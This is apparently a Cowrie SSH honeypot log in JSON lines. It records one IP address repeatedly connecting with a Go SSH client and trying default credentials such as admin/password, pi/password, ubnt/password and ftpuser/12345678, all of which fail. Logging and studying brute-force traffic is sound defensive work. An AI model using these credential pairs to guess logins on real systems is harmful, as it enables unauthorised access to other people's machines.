{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.854242Z","src_ip":"212.227.125.160","session":"83778d777d4a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.911736Z","src_ip":"212.227.125.160","session":"1ede08e1d8e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52618,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c6613d592de","protocol":"ssh","message":"New connection: 212.227.125.160:52618 (1.2.3.4:22) [session: 5c6613d592de]","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.973441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.055180Z","src_ip":"212.227.125.160","session":"5c6613d592de"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.055841Z","src_ip":"212.227.125.160","session":"5c6613d592de"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.081228Z","src_ip":"212.227.125.160","session":"61f186b6954c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.112957Z","src_ip":"212.227.125.160","session":"c4abf6f66b5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52624,"dst_ip":"1.2.3.4","dst_port":22,"session":"25303ac8267a","protocol":"ssh","message":"New connection: 212.227.125.160:52624 (1.2.3.4:22) [session: 25303ac8267a]","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.127462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.198592Z","src_ip":"212.227.125.160","session":"25303ac8267a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.199567Z","src_ip":"212.227.125.160","session":"25303ac8267a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.340523Z","src_ip":"212.227.125.160","session":"28cfe0594381"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.404923Z","src_ip":"212.227.125.160","session":"1a9a598f2372"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52636,"dst_ip":"1.2.3.4","dst_port":22,"session":"49e010f48e37","protocol":"ssh","message":"New connection: 212.227.125.160:52636 (1.2.3.4:22) [session: 49e010f48e37]","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.456882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.506637Z","src_ip":"212.227.125.160","session":"49e010f48e37"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.507490Z","src_ip":"212.227.125.160","session":"49e010f48e37"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.511661Z","src_ip":"212.227.125.160","session":"5c6613d592de"}
{"eventid":"cowrie.login.failed","username":"noc","password":"password","message":"login attempt [noc/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.628161Z","src_ip":"212.227.125.160","session":"25303ac8267a"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"password","message":"login attempt [ubnt/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.636635Z","src_ip":"212.227.125.160","session":"83778d777d4a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.840473Z","src_ip":"212.227.125.160","session":"2dc64a66bb92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52638,"dst_ip":"1.2.3.4","dst_port":22,"session":"4768aa1d3645","protocol":"ssh","message":"New connection: 212.227.125.160:52638 (1.2.3.4:22) [session: 4768aa1d3645]","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.888429Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"password","message":"login attempt [pi/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.913719Z","src_ip":"212.227.125.160","session":"49e010f48e37"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.938626Z","src_ip":"212.227.125.160","session":"4768aa1d3645"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:49.939712Z","src_ip":"212.227.125.160","session":"4768aa1d3645"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.203295Z","src_ip":"212.227.125.160","session":"c4abf6f66b5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52654,"dst_ip":"1.2.3.4","dst_port":22,"session":"a508fd11cd38","protocol":"ssh","message":"New connection: 212.227.125.160:52654 (1.2.3.4:22) [session: a508fd11cd38]","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.265383Z"}
{"eventid":"cowrie.login.failed","username":"student","password":"12345678","message":"login attempt [student/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.309129Z","src_ip":"212.227.125.160","session":"4768aa1d3645"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.384352Z","src_ip":"212.227.125.160","session":"28cfe0594381"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52664,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdca1526319c","protocol":"ssh","message":"New connection: 212.227.125.160:52664 (1.2.3.4:22) [session: bdca1526319c]","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.425930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.426780Z","src_ip":"212.227.125.160","session":"bdca1526319c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.475161Z","src_ip":"212.227.125.160","session":"bdca1526319c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.647697Z","src_ip":"212.227.125.160","session":"5c6613d592de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52668,"dst_ip":"1.2.3.4","dst_port":22,"session":"89034e91ae1a","protocol":"ssh","message":"New connection: 212.227.125.160:52668 (1.2.3.4:22) [session: 89034e91ae1a]","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.710159Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.752125Z","src_ip":"212.227.125.160","session":"25303ac8267a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.785668Z","src_ip":"212.227.125.160","session":"83778d777d4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52682,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c2a540f0236","protocol":"ssh","message":"New connection: 212.227.125.160:52682 (1.2.3.4:22) [session: 3c2a540f0236]","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.793604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.823745Z","src_ip":"212.227.125.160","session":"89034e91ae1a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.824667Z","src_ip":"212.227.125.160","session":"89034e91ae1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52690,"dst_ip":"1.2.3.4","dst_port":22,"session":"d925f97098d8","protocol":"ssh","message":"New connection: 212.227.125.160:52690 (1.2.3.4:22) [session: d925f97098d8]","sensor":"my-vps","timestamp":"2025-08-31T07:06:50.881358Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:51.004477Z","src_ip":"212.227.125.160","session":"bdca1526319c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:51.030775Z","src_ip":"212.227.125.160","session":"3c2a540f0236"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:51.031919Z","src_ip":"212.227.125.160","session":"3c2a540f0236"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:51.211630Z","src_ip":"212.227.125.160","session":"d925f97098d8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:51.212724Z","src_ip":"212.227.125.160","session":"d925f97098d8"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:51.379741Z","src_ip":"212.227.125.160","session":"49e010f48e37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52694,"dst_ip":"1.2.3.4","dst_port":22,"session":"93d3258927fa","protocol":"ssh","message":"New connection: 212.227.125.160:52694 (1.2.3.4:22) [session: 93d3258927fa]","sensor":"my-vps","timestamp":"2025-08-31T07:06:51.480463Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.030333Z","src_ip":"212.227.125.160","session":"4768aa1d3645"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52776,"dst_ip":"1.2.3.4","dst_port":22,"session":"5794172c8413","protocol":"ssh","message":"New connection: 212.227.125.160:52776 (1.2.3.4:22) [session: 5794172c8413]","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.184901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.261465Z","src_ip":"212.227.125.160","session":"93d3258927fa"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.262126Z","src_ip":"212.227.125.160","session":"93d3258927fa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.501490Z","src_ip":"212.227.125.160","session":"89034e91ae1a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.617864Z","src_ip":"212.227.125.160","session":"bdca1526319c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52792,"dst_ip":"1.2.3.4","dst_port":22,"session":"f82ba5159a74","protocol":"ssh","message":"New connection: 212.227.125.160:52792 (1.2.3.4:22) [session: f82ba5159a74]","sensor":"my-vps","timestamp":"2025-08-31T07:06:52.659696Z"}
